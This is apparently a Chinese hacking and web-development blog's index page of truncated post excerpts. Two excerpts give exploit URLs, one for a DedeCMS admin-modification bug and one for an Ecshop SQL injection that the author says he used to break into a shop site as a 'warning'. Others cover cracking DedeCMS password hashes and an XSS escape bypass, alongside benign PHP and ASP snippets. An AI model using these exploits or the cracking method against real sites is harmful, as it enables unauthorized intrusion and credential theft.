1、修改任意管理员漏洞

EXP：

plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95

&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[ [Read More…]

发现本地有家商城太自大了，真是目中无人啊…果断拿下给个警告，下面记载下这个Ecshop通杀漏洞吧！

先用下面的代码看下表的前缀（运气好下面的代码就把账号密码注射出来了）

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCB [Read More…]

网上有很好比较复杂的版本，金天给大家分享一个PHP最简单的获取IP方法，很简单，如下代码：

<?php

$ip = $_SERVER[“REMOTE_ADDR”];

echo $ip;

?>

就这么简单，那么有的朋友就拿这代码去测试了，在本地安装个环境把我代码贴进去一看，艹，你他妈是在逗我吗？IP怎么还是127.0.0.1？为什么不是我的外网IP？

我想对有这种 [Read More…]

今天一客户网站被爆了，程序是织梦，我看了下可能是注入或者弱口令爆的，忘记后台了 也懒得上去修改密码，直接从数据库改了算了，给一个代码MD5加密后放到数据库，登录的时候居然提示密码错误！蛋疼，上网看了下dedecms的加密方式居然是32位的MD5去掉前5个字符在去掉后7个字符得到20位 MD5密码，破解方法是，前减3后减1，得到16位MD5，然后在解密！ [Read More…]

大家都知道，普遍的防御XSS攻击的方法是在后台对以下字符进行转义：、’、”，但是经过本人的研究发现，在一些特殊场景下，即使对以上字符进行了转义，还是可以执行XSS攻击的。

首先看一个JS的例子：

var s = “u003cu003e”;

alert(s);

运行这段代码，结果显示如下：

看到这么熟悉的尖括号，大家会不会有一些兴奋的感觉呢？JS代码 [Read More…]

[Read More…]

大家用的标准数据库连接方式应该都是conn.asp

代码如下：

<%

On Error Resume Next

response.buffer=true

dim conn

set conn = Server.CreateObject(“adodb.connection”)

conn.open “driver={microsoft access driver (*. [Read More…]

<?php

//Code By Safe3

function customError($errno, $errstr, $errfile, $errline)

{

echo “<b>Error number:</b> [$errno],error on line $errline in $errfile<br />” ;

die(); [Read More…]

<?php

/* —————-本探针基于YaHei.net探针——————- */

error_reporting(0); //抑制所有错误信息

@header(“content-Type: text/html; charset=utf-8”); //语言强制

ob_start();

$title = “雅黑PHP探针”;

[Read More…]